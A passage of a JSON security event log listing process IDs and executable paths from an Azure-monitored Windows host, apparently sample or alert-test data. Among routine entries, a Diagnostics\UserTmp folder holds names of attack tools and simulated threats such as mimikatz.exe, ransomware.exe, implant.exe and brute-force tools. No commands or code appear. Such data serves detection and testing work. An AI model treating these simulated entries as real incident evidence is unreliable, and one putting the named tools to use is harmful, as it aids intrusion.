,\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 